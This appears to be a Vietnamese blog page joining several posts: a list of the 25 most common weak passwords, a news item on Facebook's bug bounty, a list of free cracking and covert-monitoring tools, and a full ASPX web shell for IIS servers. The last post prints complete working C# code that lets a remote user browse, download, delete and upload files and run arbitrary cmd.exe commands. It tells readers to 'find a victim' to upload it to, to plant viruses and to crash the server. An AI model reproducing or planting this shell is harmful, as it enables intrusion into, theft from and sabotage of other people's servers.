25 mật khẩu "tệ" nhất thời đại


Password hay mật khẩu là chìa khóa để người dùng Internet sử dụng để truy cập vào các trang cá nhân. Nếu “password” là mật khẩu mà bạn đang sử dụng thì rất có thể bạn đã trở thành nạn nhân của một cuộc tấn công tin tặc.

password

Theo danh sách xếp hạng thường niên những mật khẩu Internet dễ bị tin tặc tấn công nhất của SplashData thì “password” lại chính là mật khẩu có nguy cơ bị lợi dụng cao nhất hiện nay.

Cùng góp mặt trong bảng xếp hạng này còn có những mật khẩu được tạo bằng các con số liền kề hoặc các chữ cái trên bàn phím máy tính, chẳng hạn như “qwerty” và “123456” cũng như những cái tên phổ biến như “ashley” và “michael”. Những mật khẩu được người dùng Internet sử dụng phổ biến là “monkey” và “shadow” cũng rất dễ trở thành “mồi” cho tin tặc.

Chính vì thế, hiện nay, một số trang web đã bắt đầu yêu cầu người dùng phải thiết lập các mật khẩu bao gồm cả chữ số và chữ cái. Tuy nhiên, người dùng lại có thói quen tạo những mật khẩu dễ nhớ kiểu như”abc123” và “trustno1” nên không khó để tin tặc lần ra.

Và đây là bảng xếp hạng 25 mật khẩu dễ bị hack nhất mà người dùng không nên sử dụng. Danh sách này được SplashData lập ra từ hàng triệu mật khẩu bị đánh cắp mà các hacker đã đăng tải trên mạng.

1. password

2. 123456

3.12345678

4. qwerty

5. abc123

6. monkey

7. 1234567

8. letmein

9. trustno1

10. dragon

11. baseball

12. 111111

13. iloveyou

14. master

15. sunshine

16. ashley

17. bailey

18. passw0rd

19. shadow

20. 123123

21. 654321

22. superman

23. qazwsx

24. michael

25. football

Morgan Slain, Giám đốc điều hành của SplashData cảnh báo các doanh nghiệp và người dùng đang sử dụng bất cứ mật khẩu nào nằm trong danh sách này hãy thay đổi chúng ngay lập tức.

“Tin tặc có thể dễ dàng đột nhập vào nhiều tài khoản chỉ bằng cách thử liên tục những mật khẩu phổ biến”, Slain nói “Mặc dù người dùng được khuyến khích lựa chọn những mật khẩu phức tạp, có tính an toàn cao nhưng nhiều người vẫn tiếp tục lựa chọn những mật khẩu có độ bảo mật yếu, dễ dàng đoán ra được, đặt họ vào nguy cơ bị đánh cắp thông tin cá nhân và bị lừa đảo”.

Advertisements

Facebook treo thưởng "mời" hacker tấn công


Không bị kiện cáo hay trừng phạt, mà thậm chí còn được khuyến khích và tặng thưởng, đó là những gì mà Facebook đang làm. Nếu ai hack thành công mạng xã hội hàng đầu thế giới này sẽ có cơ hội nhận khoản tiền thưởng lên đến hơn 40.000 USD.

Theo đó, Facebook đã treo khoản tiền thưởng hơn 40.000 USD cho bất kỳ ai phát hiện ra những lỗi bảo mật nghiêm trọng trên mạng xã hội này.

Facebook đã mời các nhà nghiên cứu bảo mật, bao gồm cả các chuyên gia và những người yêu thích “nghệ thuật” hack, để cùng tìm hiểu những lỗ hổng bảo mật có thể có trên Facebook và gửi thông tin chi tiết lỗi về cho Facebook, và giải thưởng tối thiểu được trao cho các lỗi tìm thấy là 500 USD. Mức trao thưởng sẽ càng tăng lên tùy thuộc vào mức độ nghiêm trọng của lỗi.

Facebook treo giải thưởng hấp dẫn cho các hacker

“Chúng tôi đã trao 1 phần thưởng 5.000 USD cho một báo cáo khác tốt” – Giám đốc bảo mật của Facebook, Joe Sullivan viết trên blog của Facebook – “Trong đó có một người đã nhận được khoản tiền thưởng hơn 7.000 USD cho 6 lỗi khác nhau mà anh ấy tìm được”.

Mặc dù mạng xã hội hàng đầu thế giới này có đội ngũ bảo mật riêng, tuy nhiên Facebook vẫn công bố treo giải thưởng hấp dẫn để khai thác trí tuệ từ cộng đồng người dùng hơn 750 triệu người của mình.

“Chúng tôi thuê những người tốt nhất và sáng giá nhất” – Sullivan viết – “Tuy nhiên chúng tôi nhận thấy vẫn còn rất nhiều chuyên gia bảo mật tài năng và có thiện chí trên khắp thế giới, những người không làm việc cho Facebook”.

Theo Facebook, các chuyên gia bảo mật từ hơn 16 quốc gia khác nhau đã thông báo hàng loạt lỗi trên Facebook. Facebook cũng cố gắng đảm bảo rằng các chuyên gia bảo mật không gặp phải các rắc rối về pháp lý trong quá trình tìm lỗi của Facebook và không bị nhận diện nhầm là các hacker với mưu đồ đen tối.

Đó là cách mà các tin tặc tìm kiếm các lỗ hổng, nhưng ngay cả những người không có ý định đen tối, hay thường gọi là ‘hacker mũ trắng’ vẫn có thể gặp phải các rắc rối nếu như các nhà cung cấp dịch vụ phát hiện ý định xâm nhập của họ.

“Chúng tôi đã làm việc với các bên thứ 3 để đảm bảo sự bảo vệ cho các nhà nghiên cứu bảo mật và làm rõ rằng họ đang hợp tác với chúng tôi, không phải vì mục đích đen tối” – Sullivan viết.

Facebook cũng hy vọng có thể tìm kiếm được những nhân tài cho mình thông qua hình thức treo giải thưởng này.

Hiện Facebook không phải là hãng công nghệ duy nhất sử dụng cách thức trao thưởng để tìm lỗi trên sản phẩm của mình. Trước đây Mozilla và Google cũng đã trao các phần thưởng lớn cho những hacker tìm và công bố lỗi trên trình duyệt Firefox và Chrome.

Một số công cụ “hack” miễn phí


Nếu bạn là người ưa thích tìm hiểu, khám phá về phần mềm và những lĩnh vực có liên quan, chắc chắn sẽ phải cần đến bộ tổ hợp công cụ dùng để hack. Trong bài viết dưới đây, chúng tôi sẽ giới thiệu với các bạn một số chương trình hỗ trợ trực tuyến khá phổ biến và được nhiều người sử dụng.

1. Date Cracker 2000:

Date Cracker 2000 là 1 chương trình hỗ trợ có thể giúp người dùng xóa bỏ chế độ bảo vệ chương trình có liên quan đến thời gian sử dụng. Cách thức này rất có ích với những phần mềm có thời hạn dùng thử, cụ thể khi tiến hành áp dụng bằng Data Cracker 2000 thì trên chương trình đó của bạn sẽ hiển thị thông tin như There are 90 days remaining in your trial period. Nhưng đối với những ứng dụng được áp dụng kỹ thuật bảo vệ quá kỹ càng thì cách này không thực hiện được.

>>> Video hướng dẫn tham khảo:

2. Advanced Port Scanner:

Đây là 1 tiện ích nhỏ gọn, với dung lượng vô cùng bé, tốc độ hoạt động nhanh chóng với chức năng chính là quét các cổng đang hoạt động trên hệ thống. Tất cả những gì bạn cần làm là điền địa chỉ IP của máy tính cần kiểm tra, chương trình sẽ lập tức liệt kê và hiển thị cụ thể những thông tin trên từng cổng:

>>> Video hướng dẫn tham khảo:

3. Ophcrack:

Ứng dụng đầy “sức mạnh” này có thể dễ dàng bẻ khóa hoặc khôi phục bất cứ mật khẩu nào đối với người sử dụng hệ điều hành Windows. Để tìm hiểu cơ chế hoạt động cơ bản của Ophcrack với các hệ điều hành, các bạn hãy tham khảo video hướng dẫn mẫu dưới đây:

4. RAR Password Cracker:

Đây chắc chắn là công cụ không thể thiếu đối với bất kỳ người sử dụng nào, với khả năng có thể tìm và bẻ khóa bất kỳ mật khẩu bảo vệ nào của file RAR.

>>> Video hướng dẫn tham khảo:

5. PC Activity Monitor:

Với cơ chế hoạt động vô cùng nhẹ nhàng nhưng cũng rất hiệu quả, PC Activity Monitor gần như không gây ra bất kỳ ảnh hưởng nào đến hệ điều hành, do vậy rất phù hợp với những mô hình hệ thống với số lượng máy tính bất kỳ. Chức năng chính của PC Activity Monitor là giám sát và thu thập toàn bộ thông tin của người dùng trên máy tính, và tất cả những thông tin dữ liệu này đều được mã hóa thành file log duy nhất, sau đó sẽ được gửi đến địa chỉ email bí mật của người điều khiển đã thiết lập trước đó.

6. Cain & Abel:

Nếu muốn khôi phục mật khẩu của các tài khoản sử dụng trong hệ điều hành của Microsoft, các bạn hãy dùng Cain & Abel. Dễ dàng bắt các gói dữ liệu được truyền tải qua hệ thống mạng, bẻ khóa mật khẩu dựa vào phương pháp Dictionary, Brute – Force và Cryptanalysis, ghi lại các đoạn hội thoại VoIP…

7. SpyRemover Pro 3.05:

Với khả năng nhận dạng và tiêu diệt tới hơn 140.000 loại chương trình độc hại khác nhau, bao gồm: virus, spyware, adware, trojan… đây chắc chắn là công cụ bảo mật hỗ trợ không thể thiếu dành cho bất kỳ người sử dụng Windows nào.

8. Nikto:

Đây là 1 hệ thống web server mã nguồn mở – Open Source (GPL) có khả năng thực hiện các cuộc kiểm tra toàn diện đối với nhiều thành phần hỗ trợ khác nhau, bao gồm hơn 3500 file dữ liệu với mức độ nguy hiểm khác nhau, tương thích với hơn 900 phiên bản server…

>>> Video hướng dẫn tham khảo:

9. SuperScan:

Nếu muốn xóa những file tạm, file rác sinh ra trong quá trình sử dụng hệ thống Windows, các bạn hãy dùng SuperScan, chỉ với 1 thác tác nhấn chuột đơn giản, mọi việc sẽ được giải quyết nhanh chóng và đơn giản.

10. Yersinia:

Là 1 công cụ phục vụ trong các hệ thống mạng, nền tảng kỹ thuật vững chắc để kiểm tra, đánh giá và phân tích những hệ thống mạng ảo, qua đó dễ dàng xây dựng và đánh giá những thành phần cần thiết khi đưa vào áp dụng thực tế.

11. PuTTY:

PuTTY là trong cổng SSH client để kết nối tới chuẩn Nokia 9200 Communicator, phiên bản hiện tại của ứng dụng bao gồm một số dịch vụ hỗ trợ giao thức SSH, bộ giả lập câu lệnh Terminal và giao diện dòng lệnh quen thuộc với người sử dụng.

12. Nessus:

Với chức năng chính là rà soát để phát hiện các lỗ hổng an ninh trong các hệ thống và ứng dụng, tự động kiểm tra cấu hình, phát hiện và khôi phục dữ liệu, phân tích và báo cáo cụ thể về tình hình bảo mật hiện thời. Hiện tại, Nessus được phân phối tùy theo yêu cầu của khách hàng và quy mô cụ thể của từng hệ thống.

13. Hping:

Đây là 1 công cụ phân tích gói dữ liệu TCP/IP dựa trên giao diện dòng lệnh, được chia theo 8 chức năng cụ thể khác nhau, không chỉ hỗ trợ việc gửi thông tin ICMP tới cho các thành phần yêu cầu trong hệ thống, Hping còn hỗ trợ các giao thức khác như TCP, UDP, ICMP và RAW-IP.

14. coWPAtty:

Chức năng chính của coWPAtty khi hoạt động trong bất kỳ hệ thống nào là kiểm tra và đảm bảo độ bảo mật, an toàn của những thành phần được chia sẻ đối với hệ thống WiFi Protected Access (WPA).

15. DumpAutoComplete v0.7:

Ứng dụng này có khả năng tìm kiếm phần profile mặc định trong Firefox của tài khoản người dùng đã từng sử dụng công cụ và có tác động đến bộ phận cache AutoComplete của định dạng XML. Bên cạnh đó, những file AutoComplete có thể được gửi tới một số chương trình để phân tích. Điểm mạnh của công cụ này là hiểu được hầu hết cách thức hoạt động của hệ thống dựa trên các file autocomplete (với Firefox 1.x) cũng như dữ liệu lưu trữ dựa vào SQLite (Firefox 2.x).

File shell aspx


Đây là nội dung file shell chạy trên các máy chủ cài IIS

<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>

<%
    string outstr = "";
   
    // get pwd
    string dir = Page.MapPath(".") + "/";
    if (Request.QueryString["fdir"] != null)
        dir = Request.QueryString["fdir"] + "/";
    dir = dir.Replace("\\", "/");
    dir = dir.Replace("//", "/");
   
    // build nav for path literal
    string[] dirparts = dir.Split(‘/’);
    string linkwalk = "";   
    foreach (string curpart in dirparts)
    {
        if (curpart.Length == 0)
            continue;
        linkwalk += curpart + "/";
        outstr += string.Format("<a href=’?fdir={0}’>{1}/</a>&nbsp;",
                                    HttpUtility.UrlEncode(linkwalk),
                                    HttpUtility.HtmlEncode(curpart));
    }
    lblPath.Text = outstr;
   
    // create drive list
    outstr = "";
    foreach(DriveInfo curdrive in DriveInfo.GetDrives())
    {
        if (!curdrive.IsReady)
            continue;
        string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
        outstr += string.Format("<a href=’?fdir={0}’>{1}</a>&nbsp;",
                                    HttpUtility.UrlEncode(driveRoot),
                                    HttpUtility.HtmlEncode(driveRoot));
    }
    lblDrives.Text = outstr;

    // send file ?
    if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0))
    {
        Response.ClearContent();
        Response.WriteFile(Request.QueryString["get"]);
        Response.End();
    }

    // delete file ?
    if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0))
        File.Delete(Request.QueryString["del"]);   

    // receive files ?
    if(flUp.HasFile)
    {
        string fileName = flUp.FileName;
        int splitAt = flUp.FileName.LastIndexOfAny(new char[] { ‘/’, ‘\\’ });
        if (splitAt >= 0)
            fileName = flUp.FileName.Substring(splitAt);
        flUp.SaveAs(dir + "/" + fileName);
    }

    // enum directory and generate listing in the right pane
    DirectoryInfo di = new DirectoryInfo(dir);
    outstr = "";
    foreach (DirectoryInfo curdir in di.GetDirectories())
    {
        string fstr = string.Format("<a href=’?fdir={0}’>{1}</a>",
                                    HttpUtility.UrlEncode(dir + "/" + curdir.Name),
                                    HttpUtility.HtmlEncode(curdir.Name));
        outstr += string.Format("<tr><td>{0}</td><td>&lt;DIR&gt;</td><td></td></tr>", fstr);
    }
    foreach (FileInfo curfile in di.GetFiles())
    {
        string fstr = string.Format("<a href=’?get={0}’ target=’_blank’>{1}</a>",
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name),
                                    HttpUtility.HtmlEncode(curfile.Name));
        string astr = string.Format("<a href=’?fdir={0}&del={1}’>Del</a>",
                                    HttpUtility.UrlEncode(dir),
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name));
        outstr += string.Format("<tr><td>{0}</td><td>{1:d}</td><td>{2}</td></tr>", fstr, curfile.Length / 1024, astr);
    }
    lblDirOut.Text = outstr;

    // exec cmd ?
    if (txtCmdIn.Text.Length > 0)
    {
        Process p = new Process();
        p.StartInfo.CreateNoWindow = true;
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.WorkingDirectory = dir;
        p.Start();

        lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
        txtCmdIn.Text = "";
    }   
%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>ASPX Shell</title>
    <style type="text/css">
        * { font-family: Arial; font-size: 12px; }
        body { margin: 0px; }
        pre { font-family: Courier New; background-color: #CCCCCC; }
        h1 { font-size: 16px; background-color: #00AA00; color: #FFFFFF; padding: 5px; }
        h2 { font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
        th { text-align: left; background-color: #99CC99; }
        td { background-color: #CCFFCC; }
        pre { margin: 2px; }
    </style>
</head>
<body>
    <h1>ASPX Shell by LT</h1>
    <form id="form1" runat="server">

    <table style="width: 100%; border-width: 0px; padding: 5px;">
        <tr>
            <td style="width: 50%; vertical-align: top;">
                <h2>Shell</h2>               
                <asp:TextBox runat="server" ID="txtCmdIn" Width="300" />
                <asp:Button runat="server" ID="cmdExec" Text="Execute" />
                <pre><asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre>
            </td>
            <td style="width: 50%; vertical-align: top;">

                <h2>File Browser</h2>
                <p>
                    Drives:<br />
                    <asp:Literal runat="server" ID="lblDrives" Mode="PassThrough" />
                </p>
                <p>
                    Working directory:<br />

                    <b><asp:Literal runat="server" ID="lblPath" Mode="passThrough" /></b>
                </p>
                <table style="width: 100%">
                    <tr>
                        <th>Name</th>
                        <th>Size KB</th>
                        <th style="width: 50px">Actions</th>

                    </tr>
                    <asp:Literal runat="server" ID="lblDirOut" Mode="PassThrough" />
                </table>
                <p>Upload to this directory:<br />
                <asp:FileUpload runat="server" ID="flUp" />
                <asp:Button runat="server" ID="cmdUpload" Text="Upload" />
                </p>
            </td>

        </tr>
    </table>

    </form>
</body>
</html>

Các bạn copy nội dung trên vào notepad rồi save thành file shell.aspx rồi tiến hành tìm victim để up lên Smile

Nội dung của file shell:

– Đọc file và duyệt file trên máy chủ

– Upload file lên máy chủ (có thể up virus hay shell khác ^_^)

– Thực thi command (cmd)

Có thể up con virus từ bài Làm thế nào tạo virus sau đó thực thi câu lệnh để làm treo máy chủ Smile

Chúc vui vẻ ^_^!